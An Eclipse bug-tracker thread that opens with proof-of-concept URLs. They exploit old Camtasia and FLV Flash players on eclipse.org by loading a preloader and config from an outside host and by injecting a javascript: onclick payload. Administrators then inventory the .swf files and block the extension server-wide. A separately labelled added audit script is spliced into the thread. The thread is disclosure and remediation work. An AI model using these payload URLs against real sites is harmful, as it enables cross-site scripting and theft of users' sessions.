http://archive.eclipse.org/eclipse/screencasts/incubator/dom-binding_controller.swf?csPreloader=http://appsec.ws/ExploitDB/Configs/Camtasia/PoC_preload.swf&csConfigFile=http://appsec.ws/ExploitDB/Configs/Camtasia/PoC_config.xml&.swf

http://www.eclipse.org/sapphire/samples/jee/demo-1/WebApplicationConfigurationEditorDemo_controller.swf?csPreloader=http://appsec.ws/ExploitDB/Configs/Camtasia/PoC_preload.swf&csConfigFile=http://appsec.ws/ExploitDB/Configs/Camtasia/PoC_config.xml&.swf

http://www.eclipse.org/emf/compare/doc/features/videos/Papyrus/EMFComparePapyrus_controller.swf?csPreloader=http://appsec.ws/ExploitDB/Configs/Camtasia/PoC_preload.swf&csConfigFile=http://appsec.ws/ExploitDB/Configs/Camtasia/PoC_config.xml&.swf

http://www.eclipse.org/intent/pages/transcripts/2012_AgileALMConnect/demos/demo2_validation/validation_controller.swf?csPreloader=http://appsec.ws/ExploitDB/Configs/Camtasia/PoC_preload.swf&csConfigFile=http://appsec.ws/ExploitDB/Configs/Camtasia/PoC_config.xml&.swf

http://www.eclipse.org/atf/flash/flashFiles/player_flv_maxi.swf?flv=http://flv-player.net/medias/KyodaiNoGilga.flv&startimage=http://appsec.ws/ExploitDB/cMon.jpg&onclicktarget=_self&onclick=javascript:confirm(%27Your%20cookies%20and%20authentication%20have%20been%20captured%20and%20an%20attacker%20now%20owns%20your%20account%20and%20all%20your%20information.%27);&ondoubleclick=http://www.google.com&.swf
This looks like an old vulnerability: http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2008-January/003417.html

We should probably remove all instances of this flash player from our servers and transfer the videos to youtube. I believe the video player was created by TechSmith: http://www.techsmith.com/
> We should probably remove all instances of this flash player from our
> servers and transfer the videos to youtube.

Since it involves a bunch of projects, I'd go even further: we simply block the ".swf" extension on www.eclipse.org

Would that cause anything else to blow up?
(In reply to Denis Roy from comment #2)
> > We should probably remove all instances of this flash player from our
> > servers and transfer the videos to youtube.
>
> Since it involves a bunch of projects, I'd go even further: we simply block
> the ".swf" extension on www.eclipse.org
>
> Would that cause anything else to blow up?

+1

I think it's a good idea for us to stop supporting Flash. We should probably do a quick search to see what exactly we are going to break.
(In reply to Denis Roy from comment #2)
> Since it involves a bunch of projects, I'd go even further: we simply block
> the ".swf" extension on www.eclipse.org

+1
> find . -type f -name '*.swf' | sort | sed -e 's/^.\///' | awk -F/ '{print $1 "/" $2}' | uniq -c
     14 ajdt/demos
      1 articles/Article-Accessibility351
      3 articles/Article-Authoring-With-Eclipse
     12 atf/demos
      6 atf/flash
      1 atl/usecases
      1 atl/videos
      5 bpmn2-modeler/videos
      1 cdt/movies
      2 eclipse.org-common/yui
      5 eef/videos
     14 emf/compare
     15 epsilon/cinema
      2 equinox/documents
      2 europa/images
      2 gmt/modisco
      1 gyrex/screencasts
     14 intent/pages
      4 jubula/script
      6 jwt/press
      2 modeling/emf
      5 modeling/emft
     12 modeling/gmp
      3 modeling/mdt
      8 modeling/presentations
      8 mylyn/doc
      1 nebula/widgets
     28 org/june05release
      1 org/press-release
      1 papyrus/updates
      2 papyrus/videos
      1 projects/dev_process
      1 recommenders/assets
      3 sapphire/samples
      5 swt/e4
     34 tptp/home
      4 tptp/performance
      1 tptp/platform
      3 tptp/test
      1 webtools/community
      8 webtools/dali
      3 webtools/phoenix
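The inventory above, turned into a reusable audit script, as an added example that is not part of the bug thread: it counts .swf files per project directory the same way the pipeline does, and separately lists the two player families named in the report so an admin can see which directories break when ".swf" is blocked. It assumes the Camtasia players are named `*_controller.swf` and the FLV player `player_flv_maxi.swf` (as in the reported URLs); the sample tree it builds is constructed.

```shell
#!/bin/sh
# Added example (not from the bug thread). Inventory every .swf under a
# web root per project directory, and flag the player families named in
# the report. Name patterns are an assumption based on the reported URLs.

# Count .swf files per "project/subdir" (first two path components),
# mirroring the find | sed | awk | uniq -c pipeline from the thread.
swf_inventory() {
    docroot=$1
    (cd "$docroot" && find . -type f -name '*.swf' | sed -e 's|^\./||' \
        | awk -F/ '{print $1 "/" $2}' | sort | uniq -c)
}

# List files matching the vulnerable player name patterns (assumed).
flag_players() {
    docroot=$1
    (cd "$docroot" && find . -type f \
        \( -name '*_controller.swf' -o -name 'player_flv_maxi.swf' \) \
        | sed -e 's|^\./||' | sort)
}

# Number of flagged files; non-zero means players are still deployed.
flag_count() {
    flag_players "$1" | wc -l | tr -d ' '
}

# Constructed sample tree echoing paths mentioned in the thread.
DOCROOT=$(mktemp -d)
mkdir -p "$DOCROOT/atf/flash" "$DOCROOT/sapphire/samples/jee" \
         "$DOCROOT/emf/compare/doc" "$DOCROOT/swt/e4"
: > "$DOCROOT/atf/flash/player_flv_maxi.swf"
: > "$DOCROOT/sapphire/samples/jee/WebApplicationConfigurationEditorDemo_controller.swf"
: > "$DOCROOT/emf/compare/doc/EMFComparePapyrus_controller.swf"
: > "$DOCROOT/emf/compare/doc/EMFComparePapyrus.swf"
: > "$DOCROOT/swt/e4/demo.swf"

echo "== .swf files per project =="
swf_inventory "$DOCROOT"
echo "== flagged player files: $(flag_count "$DOCROOT") =="
flag_players "$DOCROOT"
```

Point `DOCROOT` at a real document root (and drop the constructed tree) to run it against a server; `flag_count` returning 0 after cleanup is the check that no known player remains.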
FWIW, the "copy to clipboard" functionality provided by Gerrit uses SWF.
I'd like to pretend that active projects that include third-party tools ship up-to-date versions that are not vulnerable. Maybe that is naïve. I'm planning on including a short communiqué about this to committers tomorrow.
I've added the restriction to www.eclipse.org. I'll also add it to download.eclipse.org and archive.eclipse.org and I think we'll be done.
> I'll also add it to download.eclipse.org and archive.eclipse.org and I think
> we'll be done.

Done and done. Closing. Thanks for the report.